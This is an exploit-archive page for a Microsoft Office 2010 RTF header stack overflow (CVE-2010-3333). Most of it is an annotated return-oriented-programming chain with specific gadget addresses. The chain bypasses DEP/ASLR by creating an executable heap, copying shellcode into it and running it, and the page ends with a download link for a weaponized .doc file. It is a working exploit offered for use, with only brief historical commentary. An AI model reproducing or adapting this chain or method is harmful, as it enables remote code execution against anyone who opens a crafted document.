Skip to content
cyberexploits
localwindowstext

Microsoft Office 2010 - '.RTF' Header Stack Overflow

Microsoft Office 2010 - '.RTF' Header Stack Overflow

Published on 2011-07-03

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/local/17474.txt7eac4c3a
raw
# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability

Exploit

# Date: 7/3/2011

# Author: Snake ( Shahriyar.j < at > gmail )

# Version: MS Office <= 2010

# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7

# CVE : CVE-2010-3333



# This is the exploit I wrote for Abysssec "The Arashi" article.

# It gracefully bypass DEP/ASLR in MS Office 2010,

# and we named this method "Ikazuchi DEP/ASRL Bypass" : >

# unfortunately msgr3en.dll loads a few seconds after opining office,

# so just need to open open Office , and then open exploit after a few second and saw a nice calc.

#

# The Arashi : http://abysssec.com/files/The_Arashi.pdf

#               http://www.exploit-db.com/docs/17469.pdf

#

# me : twitter.com/ponez

# aslo check here for Persian docs of this methods and more :

#   http://www.0days.ir/article/







#

# and the Rop :



3F2CB9E0    POP ECX

            RETN

        # HeapCreate() IAT = 3F10115C



3F389CA5    MOV EAX,DWORD PTR DS:[ECX]

            RETN

        # EAX == HeapCreate() Address



3F39AFCF    CALL EAX

            RETN

        # Call HeapCreate() and Create a Executable Heap :D

        # after this call, EAX contain our Heap Address.



0x3F2CB9E0    POP ECX

        RETN

        # pop 0x00008000 into ECX



0x3F39CB46    ADD EAX,ECX

        POP ESI

        RETN

        # add ECX to EAX and instead of calling HeapAlloc,

        # now EAX point to the RWX Heap :D



0x3F2CB9E0     POP ECX

        RETN

        # pop 0x3F3B3DC0 into ECX, it is a writable address.



0x3F2233CC     MOV DWORD PTR DS:[ECX],EAX

        RETN

        # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for

further use ;)



0x3F2D59DF     POP EAX

        ADD DWORD PTR DS:[EAX],ESP

        RETN

        # pop 0x3F3B3DC4 into EAX , it is writable address with zero!

        # then we add ESP to the Zero which result in storing ESP into

that address,

        # we need ESP address for copying shellcode ( which stores in

Stack ),

        # and we have to get it dynamically at run-time, now with my

tricky instruction, we have it!





0x3F2F18CC    POP EAX

        RETN

        # pop 0x3F3B3DC4 ( ESP address ) into EAX





0x3F2B745E     MOV ECX,DWORD PTR DS:[EAX]

        RETN

        # now ECX point to nearly offset of Stack.



0x3F39795E    POP EDX

        RETN

        # pop 0x00000024 into EDX



0x3F39CB44    ADD ECX,EDX

        ADD EAX,ECX

        POP ESI

        RETN

        # add 0x24 to ECX ( Stack address )



0x3F398267     MOV EAX,ECX

        RETN

        # EAX = ECX ; )



0x3F3A16DE    MOV DWORD PTR DS:[ECX],EAX

        XOR EAX,EAX

        POP ESI

        RETN

        # mov EAX ( Stack Address + 24 = Current ESP value ) into the

current Stack Location,

        # and the popping it into ESI ! now ESI point where shellcode

stores in stack :D



0x3F398267     MOV EAX,ECX

        RETN

        # EAX = ECX ; )



3F2CB9E0    POP ECX

        RETN

        # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX



0x3F389CA5     MOV EAX,DWORD PTR DS:[ECX]

        RETN

        # now EAX point to our RWX Heap



0x3F2B0A7C     XCHG EAX,EDI

        RETN 4

        # EDI = Our RWX Heap Address





3F2CB9E0    POP ECX

        RETN

        # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX

 



0x3F389CA5     MOV EAX,DWORD PTR DS:[ECX]

        RETN

        # now EAX point to our RWX Heap



0x3F38BEFB     ADD AL,58

        RETN

        # just skip some junks ; )



3F2CB9E0    POP ECX

        RETN

        # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )



3F3441B4    REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

        POP EDI

        POP ESI

        RETN

        # Copy shellcode from stack into RWX Heap





3F39AFCF     CALL EAX

        RETN

        # KABOOM !!!











Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)

View on GitHub